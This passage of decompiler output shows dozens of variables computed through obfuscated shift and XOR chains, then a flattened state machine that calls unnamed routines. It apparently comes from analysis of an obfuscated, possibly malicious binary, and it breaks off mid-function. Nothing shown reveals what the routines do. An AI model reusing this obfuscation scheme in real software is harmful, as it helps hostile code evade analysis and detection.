                                                                                                                                                                                                                    				signed int _v2708;
                                                                                                                                                                                                                    				signed int _v2712;
                                                                                                                                                                                                                    				signed int _v2716;
                                                                                                                                                                                                                    				signed int _v2720;
                                                                                                                                                                                                                    				signed int _v2724;
                                                                                                                                                                                                                    				signed int _v2728;
                                                                                                                                                                                                                    				signed int _v2732;
                                                                                                                                                                                                                    				signed int _v2736;
                                                                                                                                                                                                                    				signed int _v2740;
                                                                                                                                                                                                                    				signed int _v2744;
                                                                                                                                                                                                                    				signed int _v2748;
                                                                                                                                                                                                                    				signed int _v2752;
                                                                                                                                                                                                                    				signed int _v2756;
                                                                                                                                                                                                                    				signed int _v2760;
                                                                                                                                                                                                                    				signed int _v2764;
                                                                                                                                                                                                                    				signed int _v2768;
                                                                                                                                                                                                                    				signed int _v2772;
                                                                                                                                                                                                                    				signed int _v2776;
                                                                                                                                                                                                                    				signed int _v2780;
                                                                                                                                                                                                                    				signed int _v2784;
                                                                                                                                                                                                                    				signed int _v2788;
                                                                                                                                                                                                                    				signed int _v2792;
                                                                                                                                                                                                                    				signed int _v2796;
                                                                                                                                                                                                                    				signed int _v2800;
                                                                                                                                                                                                                    				signed int _v2804;
                                                                                                                                                                                                                    				signed int _v2808;
                                                                                                                                                                                                                    				signed int _v2812;
                                                                                                                                                                                                                    				signed int _v2816;
                                                                                                                                                                                                                    				signed int _v2820;
                                                                                                                                                                                                                    				signed int _v2824;
                                                                                                                                                                                                                    				signed int _v2828;
                                                                                                                                                                                                                    				signed int _v2832;
                                                                                                                                                                                                                    				signed int _v2836;
                                                                                                                                                                                                                    				signed int _v2840;
                                                                                                                                                                                                                    				signed int _v2844;
                                                                                                                                                                                                                    				signed int _v2848;
                                                                                                                                                                                                                    				signed int _v2852;
                                                                                                                                                                                                                    				signed int _v2856;
                                                                                                                                                                                                                    				signed int _v2860;
                                                                                                                                                                                                                    				signed int _v2864;
                                                                                                                                                                                                                    				signed int _v2868;
                                                                                                                                                                                                                    				signed int _v2872;
                                                                                                                                                                                                                    				signed int _v2876;
                                                                                                                                                                                                                    				signed int _v2880;
                                                                                                                                                                                                                    				signed int _v2884;
                                                                                                                                                                                                                    				signed int _v2888;
                                                                                                                                                                                                                    				signed int _v2892;
                                                                                                                                                                                                                    				signed int _v2896;
                                                                                                                                                                                                                    				signed int _v2900;
                                                                                                                                                                                                                    				signed int _v2904;
                                                                                                                                                                                                                    				signed int _v2908;
                                                                                                                                                                                                                    				signed int _v2912;
                                                                                                                                                                                                                    				signed int _v2916;
                                                                                                                                                                                                                    				signed int _v2920;
                                                                                                                                                                                                                    				signed int _v2924;
                                                                                                                                                                                                                    				signed int _v2928;
                                                                                                                                                                                                                    				signed int _v2932;
                                                                                                                                                                                                                    				void* _t779;
                                                                                                                                                                                                                    				void* _t780;
                                                                                                                                                                                                                    				signed int _t792;
                                                                                                                                                                                                                    				signed int _t809;
                                                                                                                                                                                                                    				signed int _t816;
                                                                                                                                                                                                                    				void* _t817;
                                                                                                                                                                                                                    				signed int _t819;
                                                                                                                                                                                                                    				signed int _t820;
                                                                                                                                                                                                                    				signed int _t821;
                                                                                                                                                                                                                    				signed int _t822;
                                                                                                                                                                                                                    				signed int _t823;
                                                                                                                                                                                                                    				signed int _t824;
                                                                                                                                                                                                                    				signed int _t825;
                                                                                                                                                                                                                    				signed int _t826;
                                                                                                                                                                                                                    				signed int _t827;
                                                                                                                                                                                                                    				signed int _t828;
                                                                                                                                                                                                                    				signed int _t829;
                                                                                                                                                                                                                    				signed int _t830;
                                                                                                                                                                                                                    				signed int _t831;
                                                                                                                                                                                                                    				signed int _t832;
                                                                                                                                                                                                                    				signed int _t833;
                                                                                                                                                                                                                    				signed int _t834;
                                                                                                                                                                                                                    				signed int _t910;
                                                                                                                                                                                                                    				signed int _t911;
                                                                                                                                                                                                                    				signed int _t912;
                                                                                                                                                                                                                    				signed int _t917;
                                                                                                                                                                                                                    				signed int* _t918;
                                                                                                                                                                                                                    				void* _t925;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t918 =  &_v2932;
                                                                                                                                                                                                                    				_v2608 = _v2608 & 0x00000000;
                                                                                                                                                                                                                    				_v2612 = 0xf3ce06;
                                                                                                                                                                                                                    				_v2792 = 0x642494;
                                                                                                                                                                                                                    				_v2792 = _v2792 + 0x1ccf;
                                                                                                                                                                                                                    				_v2792 = _v2792 >> 5;
                                                                                                                                                                                                                    				_v2792 = _v2792 ^ 0x00032222;
                                                                                                                                                                                                                    				_v2696 = 0x5eab7e;
                                                                                                                                                                                                                    				_v2696 = _v2696 + 0xfffff63d;
                                                                                                                                                                                                                    				_v2696 = _v2696 ^ 0x004ea1bb;
                                                                                                                                                                                                                    				_v2820 = 0x12f13d;
                                                                                                                                                                                                                    				_t917 = __ecx;
                                                                                                                                                                                                                    				_t912 = 0xbb51562;
                                                                                                                                                                                                                    				_t819 = 0x33;
                                                                                                                                                                                                                    				_v2820 = _v2820 / _t819;
                                                                                                                                                                                                                    				_v2820 = _v2820 << 8;
                                                                                                                                                                                                                    				_v2820 = _v2820 ^ 0x005f51ad;
                                                                                                                                                                                                                    				_v2848 = 0xcf505c;
                                                                                                                                                                                                                    				_v2848 = _v2848 ^ 0xe7b5d81a;
                                                                                                                                                                                                                    				_v2848 = _v2848 + 0xffff28b3;
                                                                                                                                                                                                                    				_v2848 = _v2848 + 0xffff71bd;
                                                                                                                                                                                                                    				_v2848 = _v2848 ^ 0xe77269c7;
                                                                                                                                                                                                                    				_v2888 = 0xfadae6;
                                                                                                                                                                                                                    				_v2888 = _v2888 << 4;
                                                                                                                                                                                                                    				_v2888 = _v2888 | 0x993bc68e;
                                                                                                                                                                                                                    				_v2888 = _v2888 << 2;
                                                                                                                                                                                                                    				_v2888 = _v2888 ^ 0x7ef93f19;
                                                                                                                                                                                                                    				_v2864 = 0xc0604;
                                                                                                                                                                                                                    				_v2864 = _v2864 << 8;
                                                                                                                                                                                                                    				_t820 = 0x52;
                                                                                                                                                                                                                    				_v2864 = _v2864 / _t820;
                                                                                                                                                                                                                    				_v2864 = _v2864 + 0xcd7e;
                                                                                                                                                                                                                    				_v2864 = _v2864 ^ 0x0022b57f;
                                                                                                                                                                                                                    				_v2664 = 0x2a4043;
                                                                                                                                                                                                                    				_t59 =  &_v2664; // 0x2a4043
                                                                                                                                                                                                                    				_t816 = 0x64;
                                                                                                                                                                                                                    				_v2664 =  *_t59 / _t816;
                                                                                                                                                                                                                    				_v2664 = _v2664 ^ 0x0008a1c3;
                                                                                                                                                                                                                    				_v2776 = 0xce84e;
                                                                                                                                                                                                                    				_v2776 = _v2776 + 0xc886;
                                                                                                                                                                                                                    				_v2776 = _v2776 ^ 0x54324eeb;
                                                                                                                                                                                                                    				_v2776 = _v2776 ^ 0x543cb0b1;
                                                                                                                                                                                                                    				_v2784 = 0x7985c1;
                                                                                                                                                                                                                    				_v2784 = _v2784 >> 0xd;
                                                                                                                                                                                                                    				_v2784 = _v2784 << 7;
                                                                                                                                                                                                                    				_v2784 = _v2784 ^ 0x0007b916;
                                                                                                                                                                                                                    				_v2692 = 0x66de1a;
                                                                                                                                                                                                                    				_v2692 = _v2692 << 0xc;
                                                                                                                                                                                                                    				_v2692 = _v2692 ^ 0x6de744fe;
                                                                                                                                                                                                                    				_v2700 = 0x7d45a9;
                                                                                                                                                                                                                    				_v2700 = _v2700 >> 0x10;
                                                                                                                                                                                                                    				_v2700 = _v2700 ^ 0x00039736;
                                                                                                                                                                                                                    				_v2924 = 0x63258b;
                                                                                                                                                                                                                    				_v2924 = _v2924 << 0xc;
                                                                                                                                                                                                                    				_v2924 = _v2924 | 0x29bbfdf6;
                                                                                                                                                                                                                    				_v2924 = _v2924 << 0xb;
                                                                                                                                                                                                                    				_v2924 = _v2924 ^ 0xdfe047c7;
                                                                                                                                                                                                                    				_v2768 = 0xeee21e;
                                                                                                                                                                                                                    				_v2768 = _v2768 ^ 0x734be970;
                                                                                                                                                                                                                    				_v2768 = _v2768 | 0x70415b93;
                                                                                                                                                                                                                    				_v2768 = _v2768 ^ 0x73e2c6c3;
                                                                                                                                                                                                                    				_v2748 = 0xc20811;
                                                                                                                                                                                                                    				_v2748 = _v2748 + 0x3235;
                                                                                                                                                                                                                    				_t910 = 0x29;
                                                                                                                                                                                                                    				_v2748 = _v2748 / _t910;
                                                                                                                                                                                                                    				_v2748 = _v2748 ^ 0x0006d936;
                                                                                                                                                                                                                    				_v2916 = 0x1f5bb7;
                                                                                                                                                                                                                    				_v2916 = _v2916 + 0x756b;
                                                                                                                                                                                                                    				_t821 = 0x6c;
                                                                                                                                                                                                                    				_v2916 = _v2916 * 0x19;
                                                                                                                                                                                                                    				_v2916 = _v2916 / _t821;
                                                                                                                                                                                                                    				_v2916 = _v2916 ^ 0x0006b7ba;
                                                                                                                                                                                                                    				_v2756 = 0x97cff1;
                                                                                                                                                                                                                    				_v2756 = _v2756 + 0xeba1;
                                                                                                                                                                                                                    				_v2756 = _v2756 + 0xff7b;
                                                                                                                                                                                                                    				_v2756 = _v2756 ^ 0x00910c87;
                                                                                                                                                                                                                    				_v2892 = 0x46d637;
                                                                                                                                                                                                                    				_v2892 = _v2892 | 0x4caeee6b;
                                                                                                                                                                                                                    				_v2892 = _v2892 ^ 0x3db80f72;
                                                                                                                                                                                                                    				_v2892 = _v2892 ^ 0xf1b593c4;
                                                                                                                                                                                                                    				_v2892 = _v2892 ^ 0x80efd9b7;
                                                                                                                                                                                                                    				_v2900 = 0x12662a;
                                                                                                                                                                                                                    				_v2900 = _v2900 + 0x4321;
                                                                                                                                                                                                                    				_v2900 = _v2900 | 0x892d0e1a;
                                                                                                                                                                                                                    				_v2900 = _v2900 >> 9;
                                                                                                                                                                                                                    				_v2900 = _v2900 ^ 0x00489ff6;
                                                                                                                                                                                                                    				_v2740 = 0xabb564;
                                                                                                                                                                                                                    				_v2740 = _v2740 | 0xc98e986c;
                                                                                                                                                                                                                    				_v2740 = _v2740 >> 0x10;
                                                                                                                                                                                                                    				_v2740 = _v2740 ^ 0x00035a47;
                                                                                                                                                                                                                    				_v2908 = 0x828da1;
                                                                                                                                                                                                                    				_t822 = 0x6d;
                                                                                                                                                                                                                    				_v2908 = _v2908 * 6;
                                                                                                                                                                                                                    				_v2908 = _v2908 << 0xc;
                                                                                                                                                                                                                    				_v2908 = _v2908 ^ 0xa51ec9e9;
                                                                                                                                                                                                                    				_v2908 = _v2908 ^ 0x500c3671;
                                                                                                                                                                                                                    				_v2684 = 0x2e6241;
                                                                                                                                                                                                                    				_v2684 = _v2684 >> 5;
                                                                                                                                                                                                                    				_v2684 = _v2684 ^ 0x00011cfc;
                                                                                                                                                                                                                    				_v2876 = 0x135ee1;
                                                                                                                                                                                                                    				_v2876 = _v2876 * 0x23;
                                                                                                                                                                                                                    				_v2876 = _v2876 | 0x3bbbffef;
                                                                                                                                                                                                                    				_v2876 = _v2876 ^ 0x3bbb2102;
                                                                                                                                                                                                                    				_v2732 = 0x7f1a72;
                                                                                                                                                                                                                    				_v2732 = _v2732 / _t822;
                                                                                                                                                                                                                    				_v2732 = _v2732 | 0x28f009fb;
                                                                                                                                                                                                                    				_v2732 = _v2732 ^ 0x28f85f51;
                                                                                                                                                                                                                    				_v2884 = 0x561ee0;
                                                                                                                                                                                                                    				_v2884 = _v2884 + 0x6c5d;
                                                                                                                                                                                                                    				_t823 = 0x7f;
                                                                                                                                                                                                                    				_v2884 = _v2884 / _t823;
                                                                                                                                                                                                                    				_v2884 = _v2884 << 2;
                                                                                                                                                                                                                    				_v2884 = _v2884 ^ 0x0005b6fe;
                                                                                                                                                                                                                    				_v2676 = 0x4e1b0e;
                                                                                                                                                                                                                    				_v2676 = _v2676 << 2;
                                                                                                                                                                                                                    				_v2676 = _v2676 ^ 0x0137ebc6;
                                                                                                                                                                                                                    				_v2724 = 0x32f27b;
                                                                                                                                                                                                                    				_t824 = 0x1f;
                                                                                                                                                                                                                    				_v2724 = _v2724 * 0x6f;
                                                                                                                                                                                                                    				_v2724 = _v2724 + 0xffff9356;
                                                                                                                                                                                                                    				_v2724 = _v2724 ^ 0x161137c8;
                                                                                                                                                                                                                    				_v2868 = 0x86b142;
                                                                                                                                                                                                                    				_v2868 = _v2868 | 0x86233406;
                                                                                                                                                                                                                    				_v2868 = _v2868 / _t824;
                                                                                                                                                                                                                    				_v2868 = _v2868 + 0x8ca0;
                                                                                                                                                                                                                    				_v2868 = _v2868 ^ 0x045bb172;
                                                                                                                                                                                                                    				_v2712 = 0xe295f4;
                                                                                                                                                                                                                    				_v2712 = _v2712 << 6;
                                                                                                                                                                                                                    				_v2712 = _v2712 ^ 0x38a99a9f;
                                                                                                                                                                                                                    				_v2852 = 0x383207;
                                                                                                                                                                                                                    				_v2852 = _v2852 >> 6;
                                                                                                                                                                                                                    				_v2852 = _v2852 + 0xfffffd57;
                                                                                                                                                                                                                    				_t825 = 0x75;
                                                                                                                                                                                                                    				_v2852 = _v2852 / _t825;
                                                                                                                                                                                                                    				_v2852 = _v2852 ^ 0x0008fe6c;
                                                                                                                                                                                                                    				_v2860 = 0xe26556;
                                                                                                                                                                                                                    				_v2860 = _v2860 ^ 0x0d996d22;
                                                                                                                                                                                                                    				_v2860 = _v2860 << 0xb;
                                                                                                                                                                                                                    				_v2860 = _v2860 + 0xffff1be2;
                                                                                                                                                                                                                    				_v2860 = _v2860 ^ 0xd8411a1c;
                                                                                                                                                                                                                    				_v2920 = 0x59fd42;
                                                                                                                                                                                                                    				_v2920 = _v2920 + 0xffff189c;
                                                                                                                                                                                                                    				_t826 = 0x36;
                                                                                                                                                                                                                    				_v2920 = _v2920 / _t826;
                                                                                                                                                                                                                    				_v2920 = _v2920 << 0xb;
                                                                                                                                                                                                                    				_v2920 = _v2920 ^ 0x0d38e5df;
                                                                                                                                                                                                                    				_v2912 = 0xba132;
                                                                                                                                                                                                                    				_v2912 = _v2912 * 0x52;
                                                                                                                                                                                                                    				_v2912 = _v2912 ^ 0xc87b5583;
                                                                                                                                                                                                                    				_v2912 = _v2912 * 0x31;
                                                                                                                                                                                                                    				_v2912 = _v2912 ^ 0x005e38f3;
                                                                                                                                                                                                                    				_v2856 = 0x934883;
                                                                                                                                                                                                                    				_v2856 = _v2856 + 0xffff40e6;
                                                                                                                                                                                                                    				_v2856 = _v2856 + 0xffff2cc3;
                                                                                                                                                                                                                    				_v2856 = _v2856 << 3;
                                                                                                                                                                                                                    				_v2856 = _v2856 ^ 0x048b463b;
                                                                                                                                                                                                                    				_v2788 = 0x95913c;
                                                                                                                                                                                                                    				_v2788 = _v2788 * 0x4d;
                                                                                                                                                                                                                    				_v2788 = _v2788 >> 2;
                                                                                                                                                                                                                    				_v2788 = _v2788 ^ 0x0b369957;
                                                                                                                                                                                                                    				_v2640 = 0xb64b98;
                                                                                                                                                                                                                    				_v2640 = _v2640 + 0x8406;
                                                                                                                                                                                                                    				_v2640 = _v2640 ^ 0x00bfe39c;
                                                                                                                                                                                                                    				_v2780 = 0x6ad32a;
                                                                                                                                                                                                                    				_v2780 = _v2780 + 0xf500;
                                                                                                                                                                                                                    				_v2780 = _v2780 << 0xb;
                                                                                                                                                                                                                    				_v2780 = _v2780 ^ 0x5e489c78;
                                                                                                                                                                                                                    				_v2668 = 0x8a169d;
                                                                                                                                                                                                                    				_v2668 = _v2668 ^ 0x3be9e2c0;
                                                                                                                                                                                                                    				_v2668 = _v2668 ^ 0x3b633b53;
                                                                                                                                                                                                                    				_v2872 = 0xcf9202;
                                                                                                                                                                                                                    				_v2872 = _v2872 << 0xe;
                                                                                                                                                                                                                    				_v2872 = _v2872 << 0xa;
                                                                                                                                                                                                                    				_v2872 = _v2872 + 0xde33;
                                                                                                                                                                                                                    				_v2872 = _v2872 ^ 0x02089e82;
                                                                                                                                                                                                                    				_v2720 = 0xd1d29c;
                                                                                                                                                                                                                    				_v2720 = _v2720 + 0xcbdb;
                                                                                                                                                                                                                    				_v2720 = _v2720 << 0xf;
                                                                                                                                                                                                                    				_v2720 = _v2720 ^ 0x4f30a45f;
                                                                                                                                                                                                                    				_v2760 = 0xd65383;
                                                                                                                                                                                                                    				_v2760 = _v2760 * 0x49;
                                                                                                                                                                                                                    				_v2760 = _v2760 >> 6;
                                                                                                                                                                                                                    				_v2760 = _v2760 ^ 0x00f7b684;
                                                                                                                                                                                                                    				_v2716 = 0x6c2e2d;
                                                                                                                                                                                                                    				_v2716 = _v2716 ^ 0xc408f1b1;
                                                                                                                                                                                                                    				_v2716 = _v2716 + 0xfffff078;
                                                                                                                                                                                                                    				_v2716 = _v2716 ^ 0xc46ff977;
                                                                                                                                                                                                                    				_v2928 = 0x9efa41;
                                                                                                                                                                                                                    				_v2928 = _v2928 << 7;
                                                                                                                                                                                                                    				_v2928 = _v2928 | 0xeef5d6e3;
                                                                                                                                                                                                                    				_v2928 = _v2928 >> 0x10;
                                                                                                                                                                                                                    				_v2928 = _v2928 ^ 0x000ad057;
                                                                                                                                                                                                                    				_v2824 = 0x95e93c;
                                                                                                                                                                                                                    				_v2824 = _v2824 >> 0xb;
                                                                                                                                                                                                                    				_t827 = 0x23;
                                                                                                                                                                                                                    				_v2824 = _v2824 / _t827;
                                                                                                                                                                                                                    				_v2824 = _v2824 ^ 0x0004bb5e;
                                                                                                                                                                                                                    				_v2752 = 0xa10c8b;
                                                                                                                                                                                                                    				_v2752 = _v2752 ^ 0x4a97ee69;
                                                                                                                                                                                                                    				_v2752 = _v2752 + 0xc47d;
                                                                                                                                                                                                                    				_v2752 = _v2752 ^ 0x4a3b17fe;
                                                                                                                                                                                                                    				_v2796 = 0x4839ed;
                                                                                                                                                                                                                    				_t373 =  &_v2796; // 0x4839ed
                                                                                                                                                                                                                    				_t828 = 0x7d;
                                                                                                                                                                                                                    				_v2796 =  *_t373 * 0x18;
                                                                                                                                                                                                                    				_v2796 = _v2796 * 0x1e;
                                                                                                                                                                                                                    				_v2796 = _v2796 ^ 0xcb2defe3;
                                                                                                                                                                                                                    				_v2880 = 0xeb66de;
                                                                                                                                                                                                                    				_v2880 = _v2880 << 2;
                                                                                                                                                                                                                    				_v2880 = _v2880 + 0x4060;
                                                                                                                                                                                                                    				_v2880 = _v2880 << 4;
                                                                                                                                                                                                                    				_v2880 = _v2880 ^ 0x3adf6725;
                                                                                                                                                                                                                    				_v2736 = 0xdf21b8;
                                                                                                                                                                                                                    				_v2736 = _v2736 + 0xffff11f6;
                                                                                                                                                                                                                    				_v2736 = _v2736 ^ 0x9d6882df;
                                                                                                                                                                                                                    				_v2736 = _v2736 ^ 0x9dbc9783;
                                                                                                                                                                                                                    				_v2728 = 0xe363d1;
                                                                                                                                                                                                                    				_v2728 = _v2728 * 0x2f;
                                                                                                                                                                                                                    				_v2728 = _v2728 * 0x6d;
                                                                                                                                                                                                                    				_v2728 = _v2728 ^ 0xc674677c;
                                                                                                                                                                                                                    				_v2660 = 0xb9c6ca;
                                                                                                                                                                                                                    				_v2660 = _v2660 + 0xfffff7e0;
                                                                                                                                                                                                                    				_v2660 = _v2660 ^ 0x00bd2f49;
                                                                                                                                                                                                                    				_v2840 = 0x1e47a;
                                                                                                                                                                                                                    				_v2840 = _v2840 / _t828;
                                                                                                                                                                                                                    				_v2840 = _v2840 ^ 0x08518ff9;
                                                                                                                                                                                                                    				_v2840 = _v2840 + 0x428e;
                                                                                                                                                                                                                    				_v2840 = _v2840 ^ 0x085e0735;
                                                                                                                                                                                                                    				_v2772 = 0xa6365d;
                                                                                                                                                                                                                    				_t829 = 0x7e;
                                                                                                                                                                                                                    				_v2772 = _v2772 * 0x2e;
                                                                                                                                                                                                                    				_v2772 = _v2772 >> 0xd;
                                                                                                                                                                                                                    				_v2772 = _v2772 ^ 0x000d7bb3;
                                                                                                                                                                                                                    				_v2644 = 0x24b4c0;
                                                                                                                                                                                                                    				_v2644 = _v2644 / _t910;
                                                                                                                                                                                                                    				_v2644 = _v2644 ^ 0x0008fba3;
                                                                                                                                                                                                                    				_v2672 = 0x452f35;
                                                                                                                                                                                                                    				_v2672 = _v2672 << 4;
                                                                                                                                                                                                                    				_v2672 = _v2672 ^ 0x04523ecf;
                                                                                                                                                                                                                    				_v2652 = 0x544b12;
                                                                                                                                                                                                                    				_v2652 = _v2652 | 0x39f4be23;
                                                                                                                                                                                                                    				_v2652 = _v2652 ^ 0x39f39529;
                                                                                                                                                                                                                    				_v2816 = 0x5b653;
                                                                                                                                                                                                                    				_v2816 = _v2816 / _t829;
                                                                                                                                                                                                                    				_v2816 = _v2816 + 0xffff16c6;
                                                                                                                                                                                                                    				_v2816 = _v2816 ^ 0xfff8490e;
                                                                                                                                                                                                                    				_v2832 = 0x2cfbfd;
                                                                                                                                                                                                                    				_t830 = 0xc;
                                                                                                                                                                                                                    				_v2832 = _v2832 / _t830;
                                                                                                                                                                                                                    				_v2832 = _v2832 << 4;
                                                                                                                                                                                                                    				_v2832 = _v2832 ^ 0x00300ee8;
                                                                                                                                                                                                                    				_v2680 = 0x43a2be;
                                                                                                                                                                                                                    				_v2680 = _v2680 << 5;
                                                                                                                                                                                                                    				_v2680 = _v2680 ^ 0x08711e00;
                                                                                                                                                                                                                    				_v2800 = 0x9c8ba4;
                                                                                                                                                                                                                    				_v2800 = _v2800 << 0xd;
                                                                                                                                                                                                                    				_v2800 = _v2800 ^ 0x7923c32f;
                                                                                                                                                                                                                    				_v2800 = _v2800 ^ 0xe85b43c1;
                                                                                                                                                                                                                    				_v2808 = 0x5e977f;
                                                                                                                                                                                                                    				_v2808 = _v2808 | 0x3e332e45;
                                                                                                                                                                                                                    				_v2808 = _v2808 / _t816;
                                                                                                                                                                                                                    				_v2808 = _v2808 ^ 0x0092a60f;
                                                                                                                                                                                                                    				_v2896 = 0x524c66;
                                                                                                                                                                                                                    				_v2896 = _v2896 | 0xcb529810;
                                                                                                                                                                                                                    				_v2896 = _v2896 + 0x84a;
                                                                                                                                                                                                                    				_t831 = 0x4e;
                                                                                                                                                                                                                    				_v2896 = _v2896 / _t831;
                                                                                                                                                                                                                    				_v2896 = _v2896 ^ 0x029a4dc0;
                                                                                                                                                                                                                    				_v2704 = 0x76113;
                                                                                                                                                                                                                    				_v2704 = _v2704 ^ 0x8d2af80f;
                                                                                                                                                                                                                    				_v2704 = _v2704 ^ 0x8d211871;
                                                                                                                                                                                                                    				_v2656 = 0xc78330;
                                                                                                                                                                                                                    				_v2656 = _v2656 ^ 0xd0f03fc9;
                                                                                                                                                                                                                    				_v2656 = _v2656 ^ 0xd0305f25;
                                                                                                                                                                                                                    				_v2636 = 0x241289;
                                                                                                                                                                                                                    				_v2636 = _v2636 ^ 0xb23f2e65;
                                                                                                                                                                                                                    				_v2636 = _v2636 ^ 0xb214c388;
                                                                                                                                                                                                                    				_v2932 = 0xa5ea7d;
                                                                                                                                                                                                                    				_v2932 = _v2932 + 0xffff1d3d;
                                                                                                                                                                                                                    				_v2932 = _v2932 + 0xffff1bc3;
                                                                                                                                                                                                                    				_v2932 = _v2932 << 5;
                                                                                                                                                                                                                    				_v2932 = _v2932 ^ 0x148f1fb3;
                                                                                                                                                                                                                    				_v2688 = 0x5463cd;
                                                                                                                                                                                                                    				_v2688 = _v2688 >> 4;
                                                                                                                                                                                                                    				_v2688 = _v2688 ^ 0x000bee93;
                                                                                                                                                                                                                    				_v2904 = 0xaf62f3;
                                                                                                                                                                                                                    				_v2904 = _v2904 + 0x9d17;
                                                                                                                                                                                                                    				_t832 = 0x47;
                                                                                                                                                                                                                    				_v2904 = _v2904 * 6;
                                                                                                                                                                                                                    				_v2904 = _v2904 * 0x21;
                                                                                                                                                                                                                    				_v2904 = _v2904 ^ 0x8824bb07;
                                                                                                                                                                                                                    				_v2744 = 0xbebb44;
                                                                                                                                                                                                                    				_v2744 = _v2744 ^ 0xf21bce59;
                                                                                                                                                                                                                    				_v2744 = _v2744 << 0xd;
                                                                                                                                                                                                                    				_v2744 = _v2744 ^ 0xaeadb133;
                                                                                                                                                                                                                    				_v2648 = 0xca09f4;
                                                                                                                                                                                                                    				_v2648 = _v2648 / _t832;
                                                                                                                                                                                                                    				_v2648 = _v2648 ^ 0x000afa6f;
                                                                                                                                                                                                                    				_v2708 = 0x368bae;
                                                                                                                                                                                                                    				_t833 = 0x21;
                                                                                                                                                                                                                    				_v2708 = _v2708 / _t833;
                                                                                                                                                                                                                    				_v2708 = _v2708 ^ 0x000388d7;
                                                                                                                                                                                                                    				_v2804 = 0xe73a24;
                                                                                                                                                                                                                    				_v2804 = _v2804 ^ 0x901cc052;
                                                                                                                                                                                                                    				_v2804 = _v2804 << 0xc;
                                                                                                                                                                                                                    				_v2804 = _v2804 ^ 0xbfaef931;
                                                                                                                                                                                                                    				_v2764 = 0x2bff0b;
                                                                                                                                                                                                                    				_t834 = 0x1a;
                                                                                                                                                                                                                    				_v2764 = _v2764 / _t834;
                                                                                                                                                                                                                    				_v2764 = _v2764 * 0x59;
                                                                                                                                                                                                                    				_v2764 = _v2764 ^ 0x00966e1f;
                                                                                                                                                                                                                    				_v2812 = 0x81548a;
                                                                                                                                                                                                                    				_v2812 = _v2812 ^ 0xca42ad3f;
                                                                                                                                                                                                                    				_v2812 = _v2812 + 0xa6b3;
                                                                                                                                                                                                                    				_v2812 = _v2812 ^ 0xcac99bb3;
                                                                                                                                                                                                                    				_v2828 = 0xd36f07;
                                                                                                                                                                                                                    				_v2828 = _v2828 | 0x6708a30a;
                                                                                                                                                                                                                    				_v2828 = _v2828 + 0xffff677f;
                                                                                                                                                                                                                    				_v2828 = _v2828 ^ 0x67d13faf;
                                                                                                                                                                                                                    				_v2836 = 0xf2ad06;
                                                                                                                                                                                                                    				_v2836 = _v2836 >> 5;
                                                                                                                                                                                                                    				_v2836 = _v2836 >> 0xb;
                                                                                                                                                                                                                    				_v2836 = _v2836 + 0xffff3019;
                                                                                                                                                                                                                    				_v2836 = _v2836 ^ 0xfff585e5;
                                                                                                                                                                                                                    				_v2844 = 0x4870d6;
                                                                                                                                                                                                                    				_t835 = 0x59;
                                                                                                                                                                                                                    				_v2844 = _v2844 / _t835;
                                                                                                                                                                                                                    				_v2844 = _v2844 ^ 0xdcfbb854;
                                                                                                                                                                                                                    				_v2844 = _v2844 ^ 0xdacb4a78;
                                                                                                                                                                                                                    				_v2844 = _v2844 ^ 0x063f3735;
                                                                                                                                                                                                                    				_t779 = E00A78D1A(_t835);
                                                                                                                                                                                                                    				_t911 = _v2712;
                                                                                                                                                                                                                    				_t817 = _t779;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					_t780 = 0xe60e7a2;
                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                    							L2:
                                                                                                                                                                                                                    							_t925 = _t912 - 0x888b9a1;
                                                                                                                                                                                                                    							if(_t925 > 0) {
                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if(_t925 == 0) {
                                                                                                                                                                                                                    								_t835 = _t911;
                                                                                                                                                                                                                    								E00A76A6B(_t911, _v2688, _v2904, _v2744, _v2648);
                                                                                                                                                                                                                    								_t918 =  &(_t918[3]);
                                                                                                                                                                                                                    								_t912 = 0x280a300;
                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                    									L1:
                                                                                                                                                                                                                    									_t780 = 0xe60e7a2;
                                                                                                                                                                                                                    									goto L2;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if(_t912 != 0x1721a79) {
                                                                                                                                                                                                                    								if(_t912 == 0x22fc8df) {
                                                                                                                                                                                                                    									_t835 = _v2628;
                                                                                                                                                                                                                    									_t911 = E00A735DB(_v2628, _v2752, _v2796, _v2632, _v2880, _v2736);
                                                                                                                                                                                                                    									_t918 =  &(_t918[4]);
                                                                                                                                                                                                                    									__eflags = _t911;
                                                                                                                                                                                                                    									_t780 = 0xe60e7a2;
                                                                                                                                                                                                                    									_t912 =  !=  ? 0xe60e7a2 : 0x280a300;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t912 == 0x280a300) {
                                                                                                                                                                                                                    										_t835 = _v2632;
                                                                                                                                                                                                                    										E00A76A6B(_v2632, _v2708, _v2804, _v2764, _v2812);
                                                                                                                                                                                                                    										_t918 =  &(_t918[3]);
                                                                                                                                                                                                                    										_t912 = 0x763e3e2;
                                                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                                                    											L1:
                                                                                                                                                                                                                    											_t780 = 0xe60e7a2;
                                                                                                                                                                                                                    											goto L2;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t912 == 0x3f2865d) {
                                                                                                                                                                                                                    											_t835 =  &_v2632;
                                                                                                                                                                                                                    											E00A73C28( &_v2632, _v2760, _v2716, _v2928, _v2824,  &_v2624);
                                                                                                                                                                                                                    											_t918 =  &(_t918[4]);
                                                                                                                                                                                                                    											asm("sbb esi, esi");
                                                                                                                                                                                                                    											_t912 = (_t912 & 0xfacbe4fd) + 0x763e3e2;
                                                                                                                                                                                                                    											while(1) {
                                                                                                                                                                                                                    												L1:
                                                                                                                                                                                                                    												_t780 = 0xe60e7a2;
                                                                                                                                                                                                                    												goto L2;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											if(_t912 == 0x763e3e2) {
                                                                                                                                                                                                                    												return E00A6E2BD(_v2624, _v2828, _v2836, _v2844);
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    											goto L27;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
